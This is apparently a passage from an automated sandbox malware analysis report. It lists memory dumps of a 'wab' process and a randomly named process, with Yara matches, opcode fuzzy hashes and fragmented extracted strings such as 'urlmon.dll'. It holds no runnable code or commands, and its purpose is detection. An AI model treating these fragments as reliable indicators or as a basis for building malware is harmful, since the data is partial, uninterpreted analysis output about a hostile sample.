                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 007bae6e2272d6fc90ca9cb5b13741cdb5ae6096fdebed7d7dee05321d27e473
                                  • Instruction ID: 22efde4b8d55a5d06f94607072ee5fd3b255c0d3e57349450c710028fc9f2f7e
                                  • Opcode Fuzzy Hash: 007bae6e2272d6fc90ca9cb5b13741cdb5ae6096fdebed7d7dee05321d27e473
                                  • Instruction Fuzzy Hash: F890023122580986D10071584844B4600855BE0305F55C116B0129624D8615C9957526
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb2f60da48400217a75dd7fc926b30aacff39c2c02e9e88555fafaabde8dd097
                                  • Instruction ID: 9f3236d3ea9bfeb68b17c0943d616c72152b3277fd54af7989d8dfdc623a25b7
                                  • Opcode Fuzzy Hash: eb2f60da48400217a75dd7fc926b30aacff39c2c02e9e88555fafaabde8dd097
                                  • Instruction Fuzzy Hash: EF90027123580186D1047158484470600C55BE1205F55C112B2159524CC529CDA5512A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2e84f455367141aef58d80a65cdafdaa6541c01673aafa5cd79a961eb7b655c
                                  • Instruction ID: a7af6300bcce575d1f6b8c0e33c750b1dad418a17aa6d2116f55fd176f944a1c
                                  • Opcode Fuzzy Hash: b2e84f455367141aef58d80a65cdafdaa6541c01673aafa5cd79a961eb7b655c
                                  • Instruction Fuzzy Hash: A190023522580546D51071585C4464600C65BD0305F55D511B0429528D8654C9E5A126
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: d4b46cef935b88bd992d3e7d4f41a0e823e611759c8c877ecf14b43a5eefbde6
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 004abda42623fe009a0109fe4f1bf2fc626823da7319d57f8dc079425733cf43
                                  • Instruction ID: 9aa61c2d15a6b4f7387b7bbed9ae7343865b6a10b79c07345c901b62425592f0
                                  • Opcode Fuzzy Hash: 004abda42623fe009a0109fe4f1bf2fc626823da7319d57f8dc079425733cf43
                                  • Instruction Fuzzy Hash: 3631A2116593F14ED30E836D08BDA75AFC28E5720174EC2EEDADA5F2F3C4888418D3A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !,$3C$7$72$>V$@)$EJ$G$JB$JW$Q8$R$RU$Ug$Z$[$^$a^$d$j$oB$pW$v$v|$yK$yk$|$>
                                  • API String ID: 0-1037518265
                                  • Opcode ID: fee4a81678f553104ae400da29571086c671368864d6998e99c821a8cd40617e
                                  • Instruction ID: ee9c211c83730504ee27b0b3ba42e5e7948d11d0bdf6d73692c8a172366cfdf7
                                  • Opcode Fuzzy Hash: fee4a81678f553104ae400da29571086c671368864d6998e99c821a8cd40617e
                                  • Instruction Fuzzy Hash: E3429DB0D05668CBEB64CF55C998BDDBBB1BB45308F1081DAD10EAB380CBB55A89CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6$O$S$\$s
                                  • API String ID: 0-3854637164
                                  • Opcode ID: 0ab83c4dcd2d40bc8ab337713dfde0c2f3239245017de608984da415b1f3cff8
                                  • Instruction ID: ac2c78925b88ecc32ae1b4a7d1cca8ff91cd6b0afe51c29058efcb48b758cba9
                                  • Opcode Fuzzy Hash: 0ab83c4dcd2d40bc8ab337713dfde0c2f3239245017de608984da415b1f3cff8
                                  • Instruction Fuzzy Hash: AC41B9B6900219BBDB10EBD4DE48EEFB3BCEF44315F44419AE90C9B240E7759A588BD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: d3$zl
                                  • API String ID: 0-3869123564
                                  • Opcode ID: bdc8d2a458fa69aac5f58a0c840ffa0d16cd5d9fb378cc1fd95531b243ad7f76
                                  • Instruction ID: aa699d08b9b604bd5395a5a368554377aadfc513ebdb174101ed0fd63f356e35
                                  • Opcode Fuzzy Hash: bdc8d2a458fa69aac5f58a0c840ffa0d16cd5d9fb378cc1fd95531b243ad7f76
                                  • Instruction Fuzzy Hash: 7201D7B6D01219AF9B44DFE8D9419EEBBF9EB18200F14866EE815F6240E77456048FA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: VL
                                  • API String ID: 0-3528648086
                                  • Opcode ID: 7a2aa897d3a56437b5ff982255c85591fc1d64c2ba49dd43489b6eaa07c06462
                                  • Instruction ID: 1a79df9a4831fd7f9d7b46df16dce44d87996c5e438d9b9fd7c2bca76f3a5ace
                                  • Opcode Fuzzy Hash: 7a2aa897d3a56437b5ff982255c85591fc1d64c2ba49dd43489b6eaa07c06462
                                  • Instruction Fuzzy Hash: 6A11DDB6D01219AF9B00DFA9DD409EEB7F8EB88210F04416BE919E7200E6705A54CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: GT
                                  • API String ID: 0-2464636624
                                  • Opcode ID: b16f8db12b5472ce7c130e8a01836ac44fb0dea1bc86374348120072ee0dadc6
                                  • Instruction ID: 6c6df44cbe49ecf3f28cb517294b7688c094d5a30094e57eb66defc3b3cd987f
                                  • Opcode Fuzzy Hash: b16f8db12b5472ce7c130e8a01836ac44fb0dea1bc86374348120072ee0dadc6
                                  • Instruction Fuzzy Hash: 56113DB6D0121CAF8B00DFE9DD419EEBBFCEF48210F04456BE918E7200E7705A048BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                  • API String ID: 0-3248090998
                                  • Opcode ID: bd81fdc555417375a6dd5530808b7d3d63d96db1923ea4c9ffbe9c4385eafaa3
                                  • Instruction ID: 476a26c2bedf79566711faca0f43587a1dc132c75328ee1770faee958177ad9c
                                  • Opcode Fuzzy Hash: bd81fdc555417375a6dd5530808b7d3d63d96db1923ea4c9ffbe9c4385eafaa3
                                  • Instruction Fuzzy Hash: 5291F0F08052A98ACB118F55A5603DFBF71BB95204F1581EDC6A97B243C3BE4E46DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                  • API String ID: 0-1002149817
                                  • Opcode ID: 1658b8f9012b4ecf80aec0445eddc73098335c5d8c044a692df3d88d9f37cde8
                                  • Instruction ID: 3a38e716fb643e296b84113cc948f6f502abcd70b8192d30bb027e8c9a47775a
                                  • Opcode Fuzzy Hash: 1658b8f9012b4ecf80aec0445eddc73098335c5d8c044a692df3d88d9f37cde8
                                  • Instruction Fuzzy Hash: FBC11EB5D00368AEDB60DFA4CD45BEEBBB8AF45304F00419AE54CBB241D7B54A88CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !,$3C$7$72$>V$@)$EJ$G$JB$JW$Q8$R$Ug$Z$[$^$d$j$oB$pW$v$v|$yK$yk$|$>
                                  • API String ID: 0-3082776261
                                  • Opcode ID: f4f7e5178675496dac0e486584b53debfd405c595847c99cfc1b98dc36107c9c
                                  • Instruction ID: bd6406ba18d90ae9d933423571c1b85819cba69cb562a0acb6b46df9c1f4f38c
                                  • Opcode Fuzzy Hash: f4f7e5178675496dac0e486584b53debfd405c595847c99cfc1b98dc36107c9c
                                  • Instruction Fuzzy Hash: 9A9128B0D05269CBEB64CF85C9587DEBBB1BB45308F5081D9C14C7B281DBBA1A89CF85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: e58c25dfbdb9db69c621e96788b759fe59851b52c732ab89618de021f60506dd
                                  • Instruction ID: 38cab77405b87e3e57b7920e325282b81ec5e94feb5f3b788beccb228ff1b8bd
                                  • Opcode Fuzzy Hash: e58c25dfbdb9db69c621e96788b759fe59851b52c732ab89618de021f60506dd
                                  • Instruction Fuzzy Hash: 729167B5D00318AAEB50EF948D85FEE77BCEF45704F0441AAE50CAA240EB715B89CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: b78fcbd1caaff72ff9777407cb6510fcd9e62f9bd6234064cc4ca57d431ae6be
                                  • Instruction ID: 6cdb62ba021403fee071b6f676a1a17bca54e829368ded3890f3ff600d3bd833
                                  • Opcode Fuzzy Hash: b78fcbd1caaff72ff9777407cb6510fcd9e62f9bd6234064cc4ca57d431ae6be
                                  • Instruction Fuzzy Hash: 77410AB0D0031CEEEB60EFA58984BDEBBB9FF05744F5041AA950CAA241D7B54B89CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %'d$+>-$!'/+$&-(!$((%k$*k|j$+*!d$-/!d$0krt$6-kr$67-+$D$hd(-$jp$qjtd$td+$tjuj$ttju$ttjujp$upwd
                                  • API String ID: 0-3443844759
                                  • Opcode ID: 7acf9eb82d2399fbb966cf03b0ed30e9195b7a4753f580493b77af4799f88ad7
                                  • Instruction ID: 317af1069924fb7edf09de05a71c1f6b0ee6ca8665cbd40049b6a11af6068831
                                  • Opcode Fuzzy Hash: 7acf9eb82d2399fbb966cf03b0ed30e9195b7a4753f580493b77af4799f88ad7
                                  • Instruction Fuzzy Hash: 9C31D8B0C017988ACF29CF95EA812DDBF70BB01740F608688E5597B291DB358A46CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %'d$+>-$!'/+$&-(!$((%k$*k|j$+*!d$-/!d$0krt$6-kr$67-+$D$hd(-$jp$qjtd$td+$tjuj$ttju$ttjujp$upwd
                                  • API String ID: 0-3443844759
                                  • Opcode ID: f76ca41e0e378e9d694578472da24b00dca5bb26151958a3600d21d0b7d16fec
                                  • Instruction ID: fc1f679fa47dff9ec8aa820273a0a097749ca8be226481637b2a51aea813061e
                                  • Opcode Fuzzy Hash: f76ca41e0e378e9d694578472da24b00dca5bb26151958a3600d21d0b7d16fec
                                  • Instruction Fuzzy Hash: 0C31DAB0C016988ACF29CF95EA812DDBF70BB01740F608688E4597F291DB358A46CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                  • API String ID: 0-392141074
                                  • Opcode ID: be93e2303832c0b43f56d05006dd121f4735a2f92ffdac9b14b19e23c62047e6
                                  • Instruction ID: a223c8e127dadb8f30fe6c4bbaeb1f55754a0e6c6193d3e4f22ffdb7a7c5a669
                                  • Opcode Fuzzy Hash: be93e2303832c0b43f56d05006dd121f4735a2f92ffdac9b14b19e23c62047e6
                                  • Instruction Fuzzy Hash: D57132B5D00318AADB25EBA4CD45FEEB77CBF04704F04459EE609AB240EB7467488FA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                  • API String ID: 0-2356907671
                                  • Opcode ID: 82800f2ab60f1ed3fbb6614186751d90bed5001dafc6535b17d257cd6bd952c9
                                  • Instruction ID: c60eea8a35f9ddd727df70ac87f21b5d2658dff68b8d0361314473d5a45bd0fd
                                  • Opcode Fuzzy Hash: 82800f2ab60f1ed3fbb6614186751d90bed5001dafc6535b17d257cd6bd952c9
                                  • Instruction Fuzzy Hash: A78184B5C003187AEBA1FBA48D81FEF73BCAF44700F44459AA50DAA241EB759749CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                  • API String ID: 0-685823316
                                  • Opcode ID: 6408de79ac2a0bb23d5ebf01fb0c1388c9b2f0332ba48e7365187f5b69046419
                                  • Instruction ID: e6780c4733e5d9c5a81cbaed475fc1f2c899fda1b193749ded1554a64d640b06
                                  • Opcode Fuzzy Hash: 6408de79ac2a0bb23d5ebf01fb0c1388c9b2f0332ba48e7365187f5b69046419
                                  • Instruction Fuzzy Hash: 392182B5D50318AAEF50DFE4CC45BEEBBB9BF04704F04815DE618BA280DBB556488BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                  • API String ID: 0-685823316
                                  • Opcode ID: 4774ee21c3d57bc1bcbdee0dacdfb55f48c980ae4e48b577dfbf3759b1917737
                                  • Instruction ID: 0080f5a65ae3a04fd2cb9d5e08767a8a23ee733bd37f6fa86f3acf6edb267eb5
                                  • Opcode Fuzzy Hash: 4774ee21c3d57bc1bcbdee0dacdfb55f48c980ae4e48b577dfbf3759b1917737
                                  • Instruction Fuzzy Hash: C62195B5D40318AADF50DF90CC44BEE7BB9BF04700F04815DE6187B280DBB516488BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                  • API String ID: 0-2304485323
                                  • Opcode ID: 07d59cf05007bf9f15a21986f78f87fb25fadd0ee218115dfc24b051170945ce
                                  • Instruction ID: 4c7ed7ed0c9e39e7dde4378774f391d0794887c29827aef0056aa15023dfa3f4
                                  • Opcode Fuzzy Hash: 07d59cf05007bf9f15a21986f78f87fb25fadd0ee218115dfc24b051170945ce
                                  • Instruction Fuzzy Hash: 97D1E8B5900304ABEB54EFE4CD85FEEB3B8BF48304F44451EE119EB240EB79A9058B60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                  • API String ID: 0-2304485323
                                  • Opcode ID: 2edd53159aefae68e0b0b990041ee707b8f17408228397ca42f5349c7229f87d
                                  • Instruction ID: df5e3e64b33568bf95d2d712d245f32fe3986fe7e9a968baaf0596809fa7bef0
                                  • Opcode Fuzzy Hash: 2edd53159aefae68e0b0b990041ee707b8f17408228397ca42f5349c7229f87d
                                  • Instruction Fuzzy Hash: 4081D5B5D00348ABDB54EFE4CD85BEEB7B8BF48304F44451EE119EB240E7B5A9058B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: L$S$\$a$c$e$l
                                  • API String ID: 0-3322591375
                                  • Opcode ID: 9aa4d9fd45fa56ce4a1a85acf37daf9b7fc557d5f3c530a4f8a6323d230bf262
                                  • Instruction ID: c63ac6cc741333ff6655c51877cf50de1c47d3b992207dbc73a89a762285cea6
                                  • Opcode Fuzzy Hash: 9aa4d9fd45fa56ce4a1a85acf37daf9b7fc557d5f3c530a4f8a6323d230bf262
                                  • Instruction Fuzzy Hash: F141B672C11318BADB60EFA4DC89AEEB7F8EF48700F05465BD50DAB200E77559458B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$f$r$x
                                  • API String ID: 0-2523166886
                                  • Opcode ID: 5d9d204b7a1df8da1e28459c6a0336e82dbcdf69dd9af6cab1f0cc3060e4283e
                                  • Instruction ID: 2edcdc62d801754bc3a0f942dd2779a48b26dc3e65674cc49a4c18e6f2a120ee
                                  • Opcode Fuzzy Hash: 5d9d204b7a1df8da1e28459c6a0336e82dbcdf69dd9af6cab1f0cc3060e4283e
                                  • Instruction Fuzzy Hash: DB51D671900304ABEB34DBA9CD88BAAF7FCFF51700F04465FE5496A280D7B4A648CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: = $ = $FALSETRUE$FALSETRUE$TRUE$TRUE
                                  • API String ID: 0-407280067
                                  • Opcode ID: 8fae921e8934c83fd2f5844084284dba5bc09fc07e3509a003e0793e21ccedc4
                                  • Instruction ID: 711598e933d10338f09bffac4674105d994b9c522243cc6a9d1345aa507da038
                                  • Opcode Fuzzy Hash: 8fae921e8934c83fd2f5844084284dba5bc09fc07e3509a003e0793e21ccedc4
                                  • Instruction Fuzzy Hash: 4B418575A823587AEB01FBA4CD46FEF777CDF55600F404046F6147E280DAB4660987E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$f$r$x
                                  • API String ID: 0-2523166886
                                  • Opcode ID: a7ea9d86e8d04bda2051841dd3bf881c4c886284b560cf257ee82d70eed6456f
                                  • Instruction ID: 2184cc33e7bb4a674ec8a00714d7e916faeffe2be5954c6aad2d1da86d44f310
                                  • Opcode Fuzzy Hash: a7ea9d86e8d04bda2051841dd3bf881c4c886284b560cf257ee82d70eed6456f
                                  • Instruction Fuzzy Hash: 85F06271D10258AADB20DFA589086DEBFB9FF41314F40855AA8047F700E7B65609CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: 12d4a893e268baa8c41f02844b9a0623df5760a2ff7af7b0d99c3a71a0243077
                                  • Instruction ID: e6d1bf33a19b82e46d369b90e9ff9ce34579f204f55b7f0719c620d2d851ae10
                                  • Opcode Fuzzy Hash: 12d4a893e268baa8c41f02844b9a0623df5760a2ff7af7b0d99c3a71a0243077
                                  • Instruction Fuzzy Hash: 586120B6A00308AFDB24DBA4CC84FEFB7FDAF48710F14455DE559A7240E774AA458BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: 280b454d22b9aa316a3ef13d5cc1bfe5000f46330adadc6caa7c57e1f1570738
                                  • Instruction ID: c1552d1fbde920cc39bac15fa0b86d429938a151b559938f91b318a5c2f0cba0
                                  • Opcode Fuzzy Hash: 280b454d22b9aa316a3ef13d5cc1bfe5000f46330adadc6caa7c57e1f1570738
